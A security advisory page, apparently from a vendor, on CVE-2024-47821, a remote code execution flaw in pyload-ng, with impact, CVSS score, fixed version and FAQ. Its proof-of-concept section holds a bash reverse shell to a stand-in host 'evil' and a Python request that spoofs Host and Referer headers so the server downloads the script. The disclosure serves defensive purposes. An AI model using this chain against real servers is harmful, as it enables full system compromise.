Summary
The folder /.pyload/scripts has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in /scripts path and using the /flashgot API to download the file.
Details
Configuration changes
- Change the download folder to
/home/<user>/.pyload/scripts - Change permissions for downloaded files:
- Change permissions of downloads: on
- Permission mode for downloaded files: 0744
Making the request to download files
The flashgot API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.
Referer header check
def flashgot():
if flask.request.referrer not in (
"http://localhost:9666/flashgot",
"http://127.0.0.1:9666/flashgot",
):
flask.abort(500)
...
Host header check for local check
def local_check(func):
@wraps(func)
def wrapper(*args, **kwargs):
remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
http_host = flask.request.environ.get("HTTP_HOST", "0")
if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
"127.0.0.1:9666",
"[::1]:9666",
):
return func(*args, **kwargs)
else:
return "Forbidden", 403
return wrapper
Once the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed
PoC
Create a malicious file. I have created a reverse shell
#!/bin/bash
bash -i >& /dev/tcp/evil/9002 0>&1
Host this file at some URL, for eg: http://evil
Create a request like this for the flashgot API. I am using download_finished folder as the destination folder. Scripts in this folder are run when a download is completed.
import requests
url = "http://pyload/flashgot"
headers = {"host": "127.0.0.1:9666", "Referer": "http://127.0.0.1:9666/flashgot"}
data = {
"package": "download_finished",
"passwords": "optional_password",
"urls": "http://evil/exp.sh",
"autostart": 1,
}
response = requests.post(url, data=data, headers=headers)
When the above request is made, exp.sh will be downloaded to /scripts/download_finished folder. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.
I also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine
Screenshots
Download folder
exp.sh is downloaded
Script is run
Reverse shell connection is received
Impact
This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
CVE-2024-47821 has a CVSS score of 9.1 (High). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.5.0b3.dev87); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-47821? CVE-2024-47821 is a high-severity OS command injection vulnerability in pyload-ng (pip), affecting versions < 0.5.0b3.dev87. It is fixed in 0.5.0b3.dev87. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2024-47821? CVE-2024-47821 has a CVSS score of 9.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of pyload-ng are affected by CVE-2024-47821? pyload-ng (pip) versions < 0.5.0b3.dev87 is affected.
- Is there a fix for CVE-2024-47821? Yes. CVE-2024-47821 is fixed in 0.5.0b3.dev87. Upgrade to this version or later.
- Is CVE-2024-47821 exploitable, and should I be worried? Whether CVE-2024-47821 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2024-47821 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-47821? Upgrade
pyload-ngto 0.5.0b3.dev87 or later.